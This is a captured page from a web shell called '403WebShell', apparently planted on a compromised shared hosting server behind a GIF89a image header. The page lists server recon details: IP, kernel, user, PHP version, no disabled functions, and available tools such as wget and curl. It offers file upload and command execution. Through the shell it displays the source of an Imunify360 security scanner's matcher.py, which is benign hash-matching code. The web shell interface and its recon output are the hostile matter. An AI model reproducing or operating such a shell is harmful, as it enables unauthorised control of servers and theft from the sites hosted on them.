GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ !ù ' !ÿ NETSCAPE2.0 , =( þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ |¥ ٭&ºìE8œ¹kGÔAÞpx­a¶­ã R2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ  4#ZÔ‰O|-4Bs‘X:= QÉ œš lºÒyXJŠGȦ|s hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ ¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5 ½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ  l5‘ޝpß ´ ˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½ ‘Ý{ó)vmÞü%D~ 6f s}ŃƒDØW Eþ`‡þ À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`} lď’ÄÉ@4>ñd œ à‘vÒxNÃ×™@žd=ˆgsžG±æ ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH] †¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ ».Û¬¯t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p% AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À× ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ ö×Þ^`8EÜ]ý.뜃Âç 7 ú ȉÞj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼ &A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`A Ú/NE€Ø†À9‚@¤à H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û °b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@% òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐ QTÂo‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3 ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚ !ù " , =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±± ¨­¶°ººE Á´”·®C¬²§Ç¶Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ» K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M '¡¨2¸*Ÿþ>#n↠å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA 9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ ²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰  h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8 #VÇá ‘å–ÄV„œ|Аè•m"сœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç? >Éxå Œ± ¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Í h‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ ü ôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶ 0QwG#¯ æš[^Äþ $ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ìL¹ „®£œŠ‚à0œ]PÁ^p F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q q” ‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/ &.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ ¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—! ¦t)K%tœ-¦JF bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ ‰ !ù ) , =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª« E$±²¨ª­ · °²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ E ééH½MÛÂGâªD­ çBêêϾD²ÒaÀà€Š1r­ðÓ¤ ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì ÁxO%ƒûX2ó—  P£n›R/¡ÑšHše+êDm?# —‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°- <‡ *´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð ;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á  ~Öº“®›¸ÏMDfJÙ °„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d €CÁW)HÜcC$€L Ä7„r.á\{)@ð` @ äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P …d’ä¡“¦ðÎTƒ¦ià|À _ ¥ Qi#¦Šg›Æ ›noMµ ›V ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥ ²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëê 7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv ,àî×Et Ÿé¶BH€ Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g› êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú— "”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»] A#ð «€¿šéz)Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa ¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oа^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ® ©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF Í[¤+‹ðɈ-áwj¨¥þ8¾rá ,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK “¦Ç# âDÂ:ûc?:R Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW ,ˆ”8(T™P‰F¡Jhç"‚ ; 403WebShell
403Webshell
Server IP : 104.21.83.152  /  Your IP : 216.73.216.155
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/imav/patchman/fs_scanner/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/lib/python3.11/site-packages/imav/patchman/fs_scanner//matcher.py
"""
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.


This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.


You should have received a copy of the GNU General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
import abc
import json
import os
from collections import defaultdict
from dataclasses import dataclass, field
from typing import List, NamedTuple, Optional

from .db import (
    DB,
    PatchDependencyMatch,
    VersionMatch,
    HashState,
    DefinitionType,
)
from .utils import HashCalculator, get_base_dir


class FileIdentifier(NamedTuple):
    rel_path: str
    hash: str
    vuln_id: Optional[int] = None
    vuln_type: Optional[int] = None


@dataclass
class VersionIdentifier:
    id: int
    hash: str
    file_identifiers: list[FileIdentifier]
    # one identifier can match multiple base_dirs, need to keep track of them to avoid duplicate scanning
    matched_base_dirs: set = field(default_factory=set)


@dataclass
class PatchDependency:
    files: list[FileIdentifier]


@dataclass
class HashDefinition:
    type: DefinitionType
    id: int
    hash: str
    state: HashState


class Matcher(abc.ABC):
    def __init__(self, input_file: str):
        self.dict_of_identifiers = self._parse_input(input_file)

    @abc.abstractmethod
    def _parse_input(self, file_path: str) -> dict[str, list[tuple]]:
        pass


class VersionsMatcher(Matcher):
    @staticmethod
    def _parse_path_hash_pairs(file_hashes: str) -> list[FileIdentifier]:
        # accepts file_hashes string like [<file_hash>|<file_path>|]*n
        # returns list of FileIdentifier objects
        parts = file_hashes.strip().split("|")
        return [
            FileIdentifier(rel_path, hash_)
            for rel_path, hash_ in zip(parts[1::2], parts[::2])
        ]

    def _parse_line(self, line: str) -> Optional[VersionIdentifier]:
        # each line is made up as <state>:<id>:<reporting_hash>:[file_hashes]
        # and <file_hashes> is a list of "<file_hash>|<file_path>|" pairs
        state, id_, hash_, file_hashes = line.strip().split(":")
        if state != "+":
            return None
        return VersionIdentifier(
            id_, hash_, self._parse_path_hash_pairs(file_hashes)
        )

    def _parse_input(
        self, file_path: str
    ) -> dict[str, list[VersionIdentifier]]:
        # reads file version_identifiers with contents like
        # +:10831:38ed3878c51c61af938cd4fd9228b23b:ad8d2ec0797fbe584a2f5c1e0985b188|classes/Product.php|e890fa7432bbe7bee4dcbbff1009ca4b|app/AppKernel.php|
        plugins_identifiers_by_path: dict[
            str, list[VersionIdentifier]
        ] = defaultdict(list)
        with open(file_path, "r") as file:
            for line in file:
                if new_identifier := self._parse_line(line):
                    plugins_identifiers_by_path[
                        new_identifier.file_identifiers[0].rel_path
                    ].append(new_identifier)
        return plugins_identifiers_by_path

    def has_full_match(
        self,
        plugin_identifier: VersionIdentifier,
        base_dir: str,
        hash_calculator: HashCalculator,
    ) -> bool:
        # 1) check that all files from file_identifiers exist in their paths relative to base_dir
        for file_identifier in plugin_identifier.file_identifiers:
            if not os.path.isfile(
                os.path.join(base_dir, file_identifier.rel_path)
            ):
                return False
        # 2) all files exist, now check their hashes
        for file_identifier in plugin_identifier.file_identifiers:
            if (
                hash_calculator.calc_hash(
                    os.path.join(base_dir, file_identifier.rel_path),
                    apply_normalization=True,
                )
                != file_identifier.hash
            ):
                return False
        return True

    def match_and_save(
        self,
        full_path: str,
        relative_path: str,
        db: DB,
        hash_calculator: HashCalculator,
    ):
        is_matched = False
        # check if we have any version_identifier matching given path
        for plugin_identifier in self.dict_of_identifiers.get(
            relative_path, []
        ):
            base_dir = get_base_dir(full_path, relative_path)
            # skip if we already have matched this base_dir with this plugin_identifier
            if (
                base_dir not in plugin_identifier.matched_base_dirs
                and self.has_full_match(
                    plugin_identifier, base_dir, hash_calculator
                )
            ):
                plugin_identifier.matched_base_dirs.add(base_dir)
                db.versions_matches.buffered_insert(
                    VersionMatch(
                        id=plugin_identifier.id,
                        path=base_dir,
                        hash=plugin_identifier.hash,
                    )
                )
                is_matched = True
        return is_matched


class PatchDependenciesMatcher(Matcher):
    def _parse_input(self, file_path: str) -> dict[str, list[PatchDependency]]:
        # read patch_dependencies file
        # each line represent a patch dependency and is made of a list of FileToPatch objects, like:
        # +[{"hash": "(...)", "checksum": "(...)", "vulnerability_type": 10, "vulnerability_id": 4346, \
        # "filename": "popup-builder/com/helpers/AdminHelper.php"}, \
        # {"hash": "(...)", "checksum": "(...)", "vulnerability_type": 10, "vulnerability_id": 4347, \
        # "filename": "popup-builder/com/classes/Ajax.php"}]
        # we should consider only those lines starting with "+"
        patch_deps: dict[str, list[PatchDependency]] = defaultdict(list)
        with open(file_path, "r") as file:
            for line in file:
                state, data = line[0], line[1:]
                if state != "+":
                    continue
                patch_dependency = PatchDependency(
                    files=[
                        FileIdentifier(
                            rel_path=_["filename"],
                            hash=_["hash"],
                            vuln_id=_["vulnerability_id"],
                            vuln_type=_["vulnerability_type"],
                        )
                        for _ in json.loads(data)
                    ]
                )
                for file_identifier in patch_dependency.files:
                    patch_deps[file_identifier.rel_path].append(
                        patch_dependency
                    )
        return patch_deps

    def match_and_save(
        self,
        full_path: str,
        relative_path: str,
        db: DB,
        hash_calculator: HashCalculator,
    ):
        is_matched = False
        for patch_dependency in self.dict_of_identifiers.get(
            relative_path, []
        ):
            base_dir = get_base_dir(full_path, relative_path)
            # for each matching file add PatchDependencyMatch to db
            # if all files matching patch_dependency are found, set dependencies_met=True to all of them
            matches_to_insert = []  # [(path, hash, vuln_id, vuln_type), ...]
            for file_identifier in patch_dependency.files:
                if (
                    file_identifier.rel_path == relative_path
                    and hash_calculator.calc_hash(
                        os.path.join(base_dir, file_identifier.rel_path),
                    )
                    == file_identifier.hash
                ):
                    # todo: fix duplicates in PatchDependencyMatch table: add a constraint in table
                    #  and make a common dict for all the file_identifiers to eliminate duplicates in ram
                    matches_to_insert.append(
                        (
                            os.path.join(base_dir, file_identifier.rel_path),
                            file_identifier.hash,
                            file_identifier.vuln_id,
                            file_identifier.vuln_type,
                        )
                    )
                    is_matched = True
            # if all files matched, set dependencies_met=True
            matches_to_insert = [
                PatchDependencyMatch(
                    *row,
                    dependencies_met=(
                        len(matches_to_insert) == len(patch_dependency.files)
                    ),
                )
                for row in matches_to_insert
            ]
            [
                db.patch_dependencies.buffered_insert(match)
                for match in matches_to_insert
            ]
        return is_matched


class HashesMatcher:
    def __init__(self, hashes_file: str):
        self.hash_records: List[HashDefinition] = self._parse_input(
            hashes_file
        )
        self._seen = set()

    @staticmethod
    def _parse_input(hashes_path: str) -> List[HashDefinition]:
        """
        Parses the hashes file and returns a list of HashDefinition,
        filtering out malware-related types and state==2.
        The lines look like <type>:<id>:<hash>:<state>
        Example: 2:675:ab43f2f7ad32404e1b923a8387f1a167:2
        Where :code:`type` can be one of the following:
        * DEFINITION_TYPE_MALWARE = 1
        * DEFINITION_TYPE_VULNERABILITY = 2
        * DEFINITION_TYPE_APPLICATION = 3
        * DEFINITION_TYPE_DRYRUN = 4
        * DEFINITION_TYPE_MALWARE_RULE = 7
        * DEFINITION_TYPE_MALWARE_RULE_DRYRUN = 8
        * DEFINITION_TYPE_VULNERABILITY_ECOMMERCE = 9
        * DEFINITION_TYPE_VULNERABILITY_PLUGIN = 10
        """
        MALWARE_TYPES = {
            DefinitionType.MALWARE.value,
            DefinitionType.MALWARE_RULE.value,
            DefinitionType.MALWARE_RULE_DRYRUN.value,
        }
        result = []
        with open(hashes_path, "r") as f:
            for line in f:
                parts = line.strip().split(":")
                if len(parts) != 4:
                    continue
                typ, id_, hash_, state = parts
                typ_int = int(typ)
                state_int = int(state)
                if (
                    typ_int in MALWARE_TYPES
                    or state_int == HashState.SUPERSEDED.value
                ):
                    continue
                result.append(
                    HashDefinition(
                        type=DefinitionType(typ_int),
                        id=int(id_),
                        hash=hash_,
                        state=HashState(state_int),
                    )
                )
        return result

    def match_and_save(self, file_path, relative_path, db, hash_calculator):
        file_hash = hash_calculator.calc_hash(file_path)
        for record in self.hash_records:
            key = (
                file_path,
                file_hash,
                record.type.value,
                record.id,
                record.state.value,
            )
            if file_hash == record.hash and key not in self._seen:
                db.hashes_matches.buffered_insert(key)
                self._seen.add(key)
                return True  # stop after first match
        return False

Youez - 2016 - github.com/yon3zu
LinuXploit